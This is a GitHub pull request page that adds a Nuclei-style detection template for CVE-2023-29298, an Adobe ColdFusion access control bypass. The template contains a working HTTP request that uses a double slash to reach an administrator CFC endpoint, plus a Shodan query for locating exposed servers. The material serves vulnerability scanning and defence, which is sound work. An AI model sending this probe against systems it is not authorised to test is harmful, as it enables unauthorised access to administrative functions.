Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

Create CVE-2023-29298.yaml #7677

Merged
merged 4 commits into from
Jul 12, 2023
Merged

Create CVE-2023-29298.yaml #7677

merged 4 commits into from
Jul 12, 2023

Conversation

princechaddha
Copy link
Member

@princechaddha princechaddha commented Jul 12, 2023
edited by ehsandeep
Loading

@DhiyaneshGeek DhiyaneshGeek mentioned this pull request Jul 12, 2023
Closed
@DhiyaneshGeek
Copy link
Member

Detection Template for Adobe ColdFusion Access Control Bypass

id: CVE-2023-29298

info:
  name: Adobe ColdFusion Access Control Bypass
  author: DhiyaneshDK
  severity: critical
  description: |
    An attacker will be able to access every CFM and CFC endpoint within the ColdFusion Administrator path /CFIDE/, of which there are 437 CFM files and 96 CFC files in a ColdFusion 2021 Update 6 install
  reference:
    - https://www.rapid7.com/blog/post/2023/07/11/cve-2023-29298-adobe-coldfusion-access-control-bypass/
    - https://nvd.nist.gov/vuln/detail/CVE-2023-29298
    - https://helpx.adobe.com/security/products/coldfusion/apsb23-40.html
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cwe-id: CWE-284
  metadata:
    max-request: 1
    shodan-query: http.component:"Adobe ColdFusion"
    verified: true
  tags: cve,cve2023,adobe,coldfusion,lfi,kev

http:
  - method: GET
    path:
      - "{{BaseURL}}//CFIDE/wizards/common/utils.cfc?method=wizardHash&inPassword=foo&_cfclient=true&returnFormat=wddx"

    matchers-condition: and
    matchers:
      - type: word
        part: header
        words:
          - 'Content-Length: 107'

      - type: word
        part: header
        words:
          - "text/html"

      - type: status
        status:
          - 200

Reference: https://blog.rapid7.com/content/images/2023/07/image1.png

@DhiyaneshGeek DhiyaneshGeek added the Done Ready to merge label Jul 12, 2023
@ehsandeep ehsandeep merged commit a20611f into main Jul 12, 2023
2 checks passed
@ehsandeep ehsandeep deleted the princechaddha-patch-2 branch July 12, 2023 22:08
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Reviewers

@ehsandeep ehsandeep ehsandeep approved these changes

@ritikchaddha ritikchaddha Awaiting requested review from ritikchaddha

Assignees

@DhiyaneshGeek DhiyaneshGeek

Labels
Done Ready to merge
Projects
None yet
Milestone
No milestone
Development

Successfully merging this pull request may close these issues.

None yet
3 participants
@princechaddha @DhiyaneshGeek @ehsandeep